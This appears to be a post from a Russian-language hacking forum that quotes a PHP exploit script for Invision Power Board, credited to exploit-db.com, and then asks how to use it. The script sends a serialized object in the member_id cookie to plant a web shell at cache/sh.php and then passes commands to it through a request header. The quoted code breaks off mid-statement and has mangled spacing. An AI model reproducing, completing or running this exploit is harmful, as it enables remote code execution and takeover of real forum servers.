04.10.2016, 04:21
|
|
Познающий
Регистрация: 29.09.2016
Сообщений: 40
С нами:
5064086
Репутация:
0
|
|
Сообщение от -=lebed=-
↑
[B] Invision Power Board \n";
print"\nExample....: php$argv[0]localhost /";
print"\nExample....: php$argv[0]localhost /ipb/\n";
die();
}
list($host,$path) = array($argv[1],$argv[2]);
$packet="GET{$path}index.php HTTP/1.0\r\n";
$packet.="Host:{$host}\r\n";
$packet.="Connection: close\r\n\r\n";
$_prefix=preg_match('/Cookie: (.+)session/',http_send($host,$packet),$m) ?$m[1] :'';
classdb_driver_mysql
{
public$obj= array('use_debug_log'=>1,'debug_log'=>'cache/sh.php');
}
# Super bypass by @i0n1c
$payload=urlencode('a:1:{i:0;O:+15:"db_driver_mysql":1:{s:3:"obj";a:2 :{s:13:"use_debug_log";i:1;s:9:"debug_log";s:12:"c ache/sh.php";}}}');
$phpcode='';
$packet="GET{$path}index.php?{$phpcode}HTTP/1.0\r\n";
$packet.="Host:{$host}\r\n";
$packet.="Cookie:{$_prefix}member_id={$payload}\r\n";
$packet.="Connection: close\r\n\r\n";
http_send($host,$packet);
$packet="GET{$path}cache/sh.php HTTP/1.0\r\n";
$packet.="Host:{$host}\r\n";
$packet.="Cmd: %s\r\n";
$packet.="Connection: close\r\n\r\n";
if (preg_match('/
[/COLOR]
[/PHP]
(c) exploit-db.com
Подскажите как юзать его?
|
|
|